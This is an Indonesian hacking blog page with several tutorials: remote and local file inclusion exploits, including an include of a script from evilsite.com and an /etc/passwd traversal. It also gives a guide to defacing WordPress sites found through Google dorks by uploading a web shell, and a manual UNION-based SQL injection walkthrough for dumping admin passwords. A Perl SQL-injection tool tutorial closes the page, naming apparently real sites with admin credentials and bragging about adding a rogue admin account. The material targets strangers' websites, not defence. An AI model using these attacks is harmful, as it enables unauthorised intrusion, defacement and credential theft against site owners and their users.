1. Remote File Inclusion

contoh script :
Code:
<?php $page=$_GET['file'];
include($page);
?>

misal :
Code:
http://www.sh4dhckr.com/get.php?file=index.php
itu artinya isi dari index.php bakal di eksekusi kedalem get.php

phpshellcode : http://evilsite.com/evilscript.txt

exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.

Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt

kalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
Code:
<?php $page="http://evilsite.com/evilscript.txt";
include($page);
?>

kadang ada script yang berisi :
Code:
<?php
$page=$_GET['page'];
include($page.'.php');
?>

jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).

Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt


2. Local File Inclusion

contoh script :
Code:
<?php
$page=$_GET['page'];
include('/pages/'.$page);
?>

sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.

misal :
Code:
http://www.sh4dhckr.com/get.php?file=../../../../../../../../../../etc/passwd

bisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.


3. Local File Disclosure/Download

contoh script :

Code:
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();

kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.

misal :
Code:
http://www.sh4dhckr.com/get.php?file=includes/config.php



CONTOH DALAM GAMBAR NEEEHHH!!!


isi vulnerable file..

[Image: 1lfifile.png]

berikut isi file yang mau kita eksekusi..

[Image: 2isitext.png]

berikut gambar file yang ter-eksekusi..

[Image: 3executed.png]

berikut contoh pesan error LFI..

[Image: 5gagallfi.png]

berikut contoh pesan error RFI

[Image: 4errorrfi.png]

RFI gagal karena setting allow_url_include di php.ini OFF..

[Image: 6phpini.png]





SEKIAN
Read More »

Sabtu, 08 Juni 2013

0 Cara Deface Web Dengan CSRF

09.32 Under From Unknown
[0 Comment]


                CSRF adalah singkatan dari Cross Site Request Forgery. Dengan CSRF ini, dapat memungkinkan kita untuk menanam shell pada web yang memiliki bug ini menggunakan suatu script. Bagaimana caranya? Simak yang satu ini.




1. Download script CSRF disini

2. Untuk mencari target, gunakan salah satu dork berikut ke google :
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
inurl:/wp-content/themes/qreator
inurl:/wp-content/themes/cleanple

3. Buka salah satu web yang akan dijadikan target.
Contoh : www.site.com/wp-content/themes/pacifico/images/
Ubah yang berwarna merah dengan theme/
Contoh : www.site.com/wp-content/themes/pacifico/theme/




4. Nah anda klik folder function lalu klik "Upload-bg.php" atau "uploadbg.php" atau "upload.php"

5. Jika muncul tulisan "error" berarti web itu vuln. Jika muncul tulisan "You must be logged to access this script" berarti tidak vuln, anda harus cari target lain.

6. Sekarang anda buka script CSRF yang tadi anda download dengan notepad (klik kanan -> open with -> notepad). Anda ganti text URLTARGET dengan link webnya. Misalkan www.site.co.uk/wp-content/themes/cleanple/theme/functions/uploadbg.php. Lalu di save.




7. Setelah pengeditan selesai & di save. Buka file CSRF yang sudah edit itu. Maka akan muncul form upload

8. Upload shell anda, jika belum punya download disini

9. Jika proses upload selesai, akan muncul tulisan yang menunjukkan dimana keberadaan shell anda misal seperti ini : www.site.co.uk/wp-content/themes/cleanple/images/bgs/25e732d93a9402n19847u0.php
Nah berarti 25e732d93a9402n19847u0.php adalah nama shell anda. Cara membukanya yaitu : www.site.com/wp-content/themes/cleanple/theme/functions/25e732d93a9402n19847u0.php

10. Dan muncullah shell anda. Silahkan anda otak atik web tersebut sesuka anda.

Read More »

0 Cara Deface Web Dengan SQL Manual

09.29 Under From Unknown
[0 Comment]


              Banyak cara yang dapat dilakukan untuk deface sebuah web, salah satunya yaitu dengan teknik SQL Injection. Banyak sekali para hacker/defacer yang menggunakan cara ini. Dan saya akan menunjukkan langkah - langkahnya.





1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.
Read More »

Jumat, 07 Juni 2013

0 Sql Injection Via Perl ( Full Tutorial )

07.34 Under From Unknown
[0 Comment]
misi gan sebelumnya, moga gak repost ya, tool ini buatan si Pr0xY, ane juga gak kenal ama tuh orang, iseng" nyari cara load file sql injection di youtube malah dapet yg begini,,

yang perlu disiapkan:

*perl (bisa didownload di sini [untuk windows] / untuk linux biasanya sudah ada);
*injection tool versi 2.2.0 by Pr0xY (download disini) password nya : hnteam
*lagu kebangsaan hacker newbie community wakaka

setelah instal perl bagi yang windows atur file main.pl menjadi seperti ini
main.pl

PHP Code:
#!c:\strawberry\perl\bin  /* tempat program perl diinstal */
system("cls"); system('title SQLi Helper by Pr0xY');system("color 02");

require 
"inc/general.pl";
require 
"MySQL/blind.pl";
require 
"MySQL/injector.pl";

&
generalPrint("".$target,1);

require 
"inc/whatdo.pl";

@
columns_found = ();$shor_way 0;$printer  "";$concat   "";

if(!(
$target =~ /.+/))
{
    print 
"Target: ";
    
chomp($target = <STDIN>);
}   
if(!(
$type =~ /\d+/) || !($comment =~ /.+/))
{
    &
firstChomp();
}
&
startInject();

exit; 

lalu cek, apakah perl sudah terinstal dengan cara kketik di cmd
perl -v
jika sudah lanjut di bawah

setelah itu kita buka cmd, masuk ke path letak file injection diletakkan,
lalu tulis perintah
PHP Code:
main.pl -
untuk help mau langsung inject juga bisa asalkan dah tau caranya

Spoiler: hide
[Image: image.jpg]

setelah masuk ke dalam :)
-c (comentar kosongin aja tulis -- )
-mc jumlah kolom yang mau km scan
-dt jenis database kalo MySql 0 kalo MsSql 1

Spoiler: hide
[Image: image.jpg]

lalu masukkan target nya, yang lemah akan sql injection wakaka
Spoiler: hide
[Image: image.jpg]

web telah terinjeksi, sekarang pilih mana yang mau lakukan
0 untuk menghentikan program
1 untuk melihat" name database yg satu server sama database tersebut (enak kan? wakaka)
2 untuk melihat isi tabel
3 untuk mendapatkan kolom
4 untuk mendapat data dari kolom yg sudah didapatkan
5 untuk load file (tritnya terpisah, mungkin besok dibikinnya, tar sore mau PM di sekolah)
6 untuk mendapat mysql.user (ane juga kurang ngerti sebenarnya kalo yg ini wakaka)
7 untuk menyimpan semua kegiatan yg kamu lakukan pada program ini
Spoiler: hide
[Image: image.jpg]

kita masukkan perintah 2 untuk melihat tabel pada database dreamarticle masukkan nama database dan kau akan tahu hasilnya wakaka
Spoiler: hide
[Image: image.jpg]

wah ! dah ketemu tuh tabel admin nya da_admin yaudah, kita coba lihat isi kolom yg ada pada tabel da_admin tersebut
Spoiler: hide
[Image: image.jpg]

setelah kolomnya terlihat kita pilih perintah no 4
setelah itu kita masukkan berapa kolom yg mau kita baca, ane mau baca semuanya, kan kolomnya ada 6 tuh, jadi ane tulis 6 deh
setelah itu tulis nama kolom yang mau kamu lihat isinya ( 6 kolom )
Spoiler: hide
[Image: image.jpg]

pada pilihan yg ditampilkan ketik aja n (ane juga kurang tau fungsinya, nanti kalo dah ada yg tau pm ane ya :) )
terus ketik waktu untuk mencarinya tulis aja 50
Spoiler: hide
[Image: image.jpg]

setelah klik enter dan tunggu hasilnya
Spoiler: hide
[Image: image.jpg]

YES!!! password admin telah di dapatkan
(maaf ya , waktu ane masuk ke login panel admin, ane buat user baru bernama exsnap wakaka )
Spoiler: hide
[Image: image.jpg]

data yg sudah di save tadi bisa dilihat di folder scans
Spoiler: hide
[Image: image.jpg]

site : http://www.pkwhg.com/admin/
user : admin
pass : admin

hasil dari tutor : http://www.pkwhg.com/admin/2012011906290794113.html
http://nachtvandeeuregio.be/sub_jogging2.php

untuk video bisa dilihat disini tutorial video

sekian tutor dari ane, kalo ada salah harap dimaklumi karna ane hanya seorang nubie yg mau berbagi Bahagia

thanks buat kaka" hn yg dah mau ane ajak ngobrol selama di IRC, yg bisa bantu ane semangat lagi
thanks to: killerbyte,dZhenway,_up,hogyz,einzten,ada lagi tapi lupa namanya (maaf)
satu lagi, orang pertama yg mau ngajarin ane :) kk blackz tapi ga tau kemana, dah jarang ketemu :(

selain bisa sql injection bisa juga load file, adminfinder, dll, load file tutornya ane buat besok aja ya, soalnya tar sore ane mau pm di sekolah,

SUMBER

cendolnya ka kalo boleh :)
Read More »